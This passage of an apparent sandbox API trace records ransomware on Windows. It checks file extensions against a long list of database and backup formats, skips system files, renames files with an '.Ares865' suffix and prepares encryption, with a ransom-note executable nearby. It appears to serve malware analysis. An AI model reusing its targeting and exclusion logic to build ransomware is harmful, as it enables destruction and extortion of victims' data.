lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.047] lstrlenW (lpString="jtx") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.047] lstrlenW (lpString="kdb") returned 3 [0040.047] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.047] lstrlenW (lpString="kexi") returned 4 [0040.048] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.048] lstrlenW (lpString="kexic") returned 5 [0040.048] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.048] lstrlenW (lpString="kexis") returned 5 [0040.048] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.048] lstrlenW (lpString="lgc") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.048] lstrlenW (lpString="lwx") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.048] lstrlenW (lpString="maf") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.048] lstrlenW (lpString="maq") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.048] lstrlenW (lpString="mar") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.048] lstrlenW (lpString="marshal") returned 7 [0040.048] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.048] lstrlenW (lpString="mas") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.048] lstrlenW (lpString="mav") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.048] lstrlenW (lpString="maw") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.048] lstrlenW (lpString="mdbhtml") returned 7 [0040.048] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.048] lstrlenW (lpString="mdn") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.048] lstrlenW (lpString="mdt") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.048] lstrlenW (lpString="mfd") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.048] lstrlenW (lpString="mpd") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.048] lstrlenW (lpString="mrg") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.048] lstrlenW (lpString="mud") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.048] lstrlenW (lpString="mwb") returned 3 [0040.048] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.049] lstrlenW (lpString="myd") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.049] lstrlenW (lpString="ndf") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.049] lstrlenW (lpString="nnt") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.049] lstrlenW (lpString="nrmlib") returned 6 [0040.049] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.049] lstrlenW (lpString="ns2") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.049] lstrlenW (lpString="ns3") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.049] lstrlenW (lpString="ns4") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.049] lstrlenW (lpString="nsf") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.049] lstrlenW (lpString="nv") returned 2 [0040.049] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.049] lstrlenW (lpString="nv2") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.049] lstrlenW (lpString="nwdb") returned 4 [0040.049] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.049] lstrlenW (lpString="nyf") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.049] lstrlenW (lpString="odb") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.049] lstrlenW (lpString="odb") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.049] lstrlenW (lpString="oqy") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.049] lstrlenW (lpString="ora") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.049] lstrlenW (lpString="orx") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.049] lstrlenW (lpString="owc") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.049] lstrlenW (lpString="p96") returned 3 [0040.049] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.049] lstrlenW (lpString="p97") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.050] lstrlenW (lpString="pan") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.050] lstrlenW (lpString="pdb") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.050] lstrlenW (lpString="pdm") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.050] lstrlenW (lpString="pnz") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.050] lstrlenW (lpString="qry") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.050] lstrlenW (lpString="qvd") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.050] lstrlenW (lpString="rbf") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.050] lstrlenW (lpString="rctd") returned 4 [0040.050] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.050] lstrlenW (lpString="rod") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.050] lstrlenW (lpString="rodx") returned 4 [0040.050] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.050] lstrlenW (lpString="rpd") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.050] lstrlenW (lpString="rsd") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.050] lstrlenW (lpString="sas7bdat") returned 8 [0040.050] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.050] lstrlenW (lpString="sbf") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.050] lstrlenW (lpString="scx") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.050] lstrlenW (lpString="sdb") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.050] lstrlenW (lpString="sdc") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.050] lstrlenW (lpString="sdf") returned 3 [0040.050] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.050] lstrlenW (lpString="sis") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.051] lstrlenW (lpString="spq") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.051] lstrlenW (lpString="te") returned 2 [0040.051] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.051] lstrlenW (lpString="teacher") returned 7 [0040.051] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.051] lstrlenW (lpString="tmd") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.051] lstrlenW (lpString="tps") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.051] lstrlenW (lpString="trc") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.051] lstrlenW (lpString="trc") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.051] lstrlenW (lpString="trm") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.051] lstrlenW (lpString="udb") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.051] lstrlenW (lpString="udl") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.051] lstrlenW (lpString="usr") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.051] lstrlenW (lpString="v12") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.051] lstrlenW (lpString="vis") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.051] lstrlenW (lpString="vpd") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.051] lstrlenW (lpString="vvv") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.051] lstrlenW (lpString="wdb") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.051] lstrlenW (lpString="wmdb") returned 4 [0040.051] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.051] lstrlenW (lpString="wrk") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.051] lstrlenW (lpString="xdb") returned 3 [0040.051] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.052] lstrlenW (lpString="xld") returned 3 [0040.052] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.052] lstrlenW (lpString="xmlff") returned 5 [0040.052] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.052] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.Ares865") returned 56 [0040.052] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0040.052] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0040.052] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326) returned 1 [0040.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0040.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0040.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0040.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0040.168] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0040.168] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0040.169] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x12c [0040.173] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0040.174] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0040.175] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0040.175] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0040.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb310 [0040.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb310 [0040.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0040.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0040.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0040.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0040.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0040.175] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0040.175] CloseHandle (hObject=0x12c) returned 1 [0040.175] CloseHandle (hObject=0x118) returned 1 [0040.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0040.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0040.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0040.177] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49569760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.177] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.177] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="aoldtz.exe") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="..") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="windows") returned -1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="bootmgr") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="temp") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="pagefile.sys") returned 1 [0040.177] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="boot") returned 1 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="ids.txt") returned 1 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="ntuser.dat") returned 1 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="perflogs") returned 1 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="MSBuild") returned 1 [0040.178] lstrlenW (lpString="Wildlife.wmv") returned 12 [0040.178] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 48 [0040.178] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Wildlife.wmv" | out: lpString1="Wildlife.wmv") returned="Wildlife.wmv" [0040.178] lstrlenW (lpString="Wildlife.wmv") returned 12 [0040.178] lstrlenW (lpString="Ares865") returned 7 [0040.178] lstrcmpiW (lpString1="ife.wmv", lpString2="Ares865") returned 1 [0040.178] lstrlenW (lpString=".dll") returned 4 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".dll") returned 1 [0040.178] lstrlenW (lpString=".lnk") returned 4 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".lnk") returned 1 [0040.178] lstrlenW (lpString=".ini") returned 4 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".ini") returned 1 [0040.178] lstrlenW (lpString=".sys") returned 4 [0040.178] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".sys") returned 1 [0040.178] lstrlenW (lpString="Wildlife.wmv") returned 12 [0040.178] lstrlenW (lpString="bak") returned 3 [0040.178] lstrcmpiW (lpString1="wmv", lpString2="bak") returned 1 [0040.178] lstrlenW (lpString="ba_") returned 3 [0040.178] lstrcmpiW (lpString1="wmv", lpString2="ba_") returned 1 [0040.178] lstrlenW (lpString="dbb") returned 3 [0040.178] lstrcmpiW (lpString1="wmv", lpString2="dbb") returned 1 [0040.178] lstrlenW (lpString="vmdk") returned 4 [0040.178] lstrcmpiW (lpString1=".wmv", lpString2="vmdk") returned -1 [0040.178] lstrlenW (lpString="rar") returned 3 [0040.178] lstrcmpiW (lpString1="wmv", lpString2="rar") returned 1 [0040.178] lstrlenW (lpString="zip") returned 3 [0040.178] lstrcmpiW (lpString1="wmv", lpString2="zip") returned -1 [0040.178] lstrlenW (lpString="tgz") returned 3 [0040.178] lstrcmpiW (lpString1="wmv", lpString2="tgz") returned 1 [0040.178] lstrlenW (lpString="vbox") returned 4 [0040.179] lstrcmpiW (lpString1=".wmv", lpString2="vbox") returned -1 [0040.179] lstrlenW (lpString="vdi") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="vdi") returned 1 [0040.179] lstrlenW (lpString="vhd") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="vhd") returned 1 [0040.179] lstrlenW (lpString="vhdx") returned 4 [0040.179] lstrcmpiW (lpString1=".wmv", lpString2="vhdx") returned -1 [0040.179] lstrlenW (lpString="avhd") returned 4 [0040.179] lstrcmpiW (lpString1=".wmv", lpString2="avhd") returned -1 [0040.179] lstrlenW (lpString="db") returned 2 [0040.179] lstrcmpiW (lpString1="mv", lpString2="db") returned 1 [0040.179] lstrlenW (lpString="db2") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="db2") returned 1 [0040.179] lstrlenW (lpString="db3") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="db3") returned 1 [0040.179] lstrlenW (lpString="dbf") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="dbf") returned 1 [0040.179] lstrlenW (lpString="mdf") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="mdf") returned 1 [0040.179] lstrlenW (lpString="mdb") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="mdb") returned 1 [0040.179] lstrlenW (lpString="sql") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="sql") returned 1 [0040.179] lstrlenW (lpString="sqlite") returned 6 [0040.179] lstrcmpiW (lpString1="fe.wmv", lpString2="sqlite") returned -1 [0040.179] lstrlenW (lpString="sqlite3") returned 7 [0040.179] lstrcmpiW (lpString1="ife.wmv", lpString2="sqlite3") returned -1 [0040.179] lstrlenW (lpString="sqlitedb") returned 8 [0040.179] lstrcmpiW (lpString1="life.wmv", lpString2="sqlitedb") returned -1 [0040.179] lstrlenW (lpString="xml") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="xml") returned -1 [0040.179] lstrlenW (lpString="$er") returned 3 [0040.179] lstrcmpiW (lpString1="wmv", lpString2="$er") returned 1 [0040.179] lstrlenW (lpString="4dd") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="4dd") returned 1 [0040.180] lstrlenW (lpString="4dl") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="4dl") returned 1 [0040.180] lstrlenW (lpString="^^^") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="^^^") returned 1 [0040.180] lstrlenW (lpString="abs") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="abs") returned 1 [0040.180] lstrlenW (lpString="abx") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="abx") returned 1 [0040.180] lstrlenW (lpString="accdb") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accdb") returned 1 [0040.180] lstrlenW (lpString="accdc") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accdc") returned 1 [0040.180] lstrlenW (lpString="accde") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accde") returned 1 [0040.180] lstrlenW (lpString="accdr") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accdr") returned 1 [0040.180] lstrlenW (lpString="accdt") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accdt") returned 1 [0040.180] lstrlenW (lpString="accdw") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accdw") returned 1 [0040.180] lstrlenW (lpString="accft") returned 5 [0040.180] lstrcmpiW (lpString1="e.wmv", lpString2="accft") returned 1 [0040.180] lstrlenW (lpString="adb") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="adb") returned 1 [0040.180] lstrlenW (lpString="adb") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="adb") returned 1 [0040.180] lstrlenW (lpString="ade") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="ade") returned 1 [0040.180] lstrlenW (lpString="adf") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="adf") returned 1 [0040.180] lstrlenW (lpString="adn") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="adn") returned 1 [0040.180] lstrlenW (lpString="adp") returned 3 [0040.180] lstrcmpiW (lpString1="wmv", lpString2="adp") returned 1 [0040.180] lstrlenW (lpString="alf") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="alf") returned 1 [0040.181] lstrlenW (lpString="ask") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="ask") returned 1 [0040.181] lstrlenW (lpString="btr") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="btr") returned 1 [0040.181] lstrlenW (lpString="cat") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="cat") returned 1 [0040.181] lstrlenW (lpString="cdb") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="cdb") returned 1 [0040.181] lstrlenW (lpString="ckp") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="ckp") returned 1 [0040.181] lstrlenW (lpString="cma") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="cma") returned 1 [0040.181] lstrlenW (lpString="cpd") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="cpd") returned 1 [0040.181] lstrlenW (lpString="dacpac") returned 6 [0040.181] lstrcmpiW (lpString1="fe.wmv", lpString2="dacpac") returned 1 [0040.181] lstrlenW (lpString="dad") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="dad") returned 1 [0040.181] lstrlenW (lpString="dadiagrams") returned 10 [0040.181] lstrcmpiW (lpString1="ldlife.wmv", lpString2="dadiagrams") returned 1 [0040.181] lstrlenW (lpString="daschema") returned 8 [0040.181] lstrcmpiW (lpString1="life.wmv", lpString2="daschema") returned 1 [0040.181] lstrlenW (lpString="db-journal") returned 10 [0040.181] lstrcmpiW (lpString1="ldlife.wmv", lpString2="db-journal") returned 1 [0040.181] lstrlenW (lpString="db-shm") returned 6 [0040.181] lstrcmpiW (lpString1="fe.wmv", lpString2="db-shm") returned 1 [0040.181] lstrlenW (lpString="db-wal") returned 6 [0040.181] lstrcmpiW (lpString1="fe.wmv", lpString2="db-wal") returned 1 [0040.181] lstrlenW (lpString="dbc") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="dbc") returned 1 [0040.181] lstrlenW (lpString="dbs") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="dbs") returned 1 [0040.181] lstrlenW (lpString="dbt") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="dbt") returned 1 [0040.181] lstrlenW (lpString="dbv") returned 3 [0040.181] lstrcmpiW (lpString1="wmv", lpString2="dbv") returned 1 [0040.182] lstrlenW (lpString="dbx") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dbx") returned 1 [0040.182] lstrlenW (lpString="dcb") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dcb") returned 1 [0040.182] lstrlenW (lpString="dct") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dct") returned 1 [0040.182] lstrlenW (lpString="dcx") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dcx") returned 1 [0040.182] lstrlenW (lpString="ddl") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="ddl") returned 1 [0040.182] lstrlenW (lpString="dlis") returned 4 [0040.182] lstrcmpiW (lpString1=".wmv", lpString2="dlis") returned -1 [0040.182] lstrlenW (lpString="dp1") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dp1") returned 1 [0040.182] lstrlenW (lpString="dqy") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dqy") returned 1 [0040.182] lstrlenW (lpString="dsk") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dsk") returned 1 [0040.182] lstrlenW (lpString="dsn") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dsn") returned 1 [0040.182] lstrlenW (lpString="dtsx") returned 4 [0040.182] lstrcmpiW (lpString1=".wmv", lpString2="dtsx") returned -1 [0040.182] lstrlenW (lpString="dxl") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="dxl") returned 1 [0040.182] lstrlenW (lpString="eco") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="eco") returned 1 [0040.182] lstrlenW (lpString="ecx") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="ecx") returned 1 [0040.182] lstrlenW (lpString="edb") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="edb") returned 1 [0040.182] lstrlenW (lpString="epim") returned 4 [0040.182] lstrcmpiW (lpString1=".wmv", lpString2="epim") returned -1 [0040.182] lstrlenW (lpString="fcd") returned 3 [0040.182] lstrcmpiW (lpString1="wmv", lpString2="fcd") returned 1 [0040.183] lstrlenW (lpString="fdb") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fdb") returned 1 [0040.183] lstrlenW (lpString="fic") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fic") returned 1 [0040.183] lstrlenW (lpString="flexolibrary") returned 12 [0040.183] lstrlenW (lpString="fm5") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fm5") returned 1 [0040.183] lstrlenW (lpString="fmp") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fmp") returned 1 [0040.183] lstrlenW (lpString="fmp12") returned 5 [0040.183] lstrcmpiW (lpString1="e.wmv", lpString2="fmp12") returned -1 [0040.183] lstrlenW (lpString="fmpsl") returned 5 [0040.183] lstrcmpiW (lpString1="e.wmv", lpString2="fmpsl") returned -1 [0040.183] lstrlenW (lpString="fol") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fol") returned 1 [0040.183] lstrlenW (lpString="fp3") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fp3") returned 1 [0040.183] lstrlenW (lpString="fp4") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fp4") returned 1 [0040.183] lstrlenW (lpString="fp5") returned 3 [0040.183] 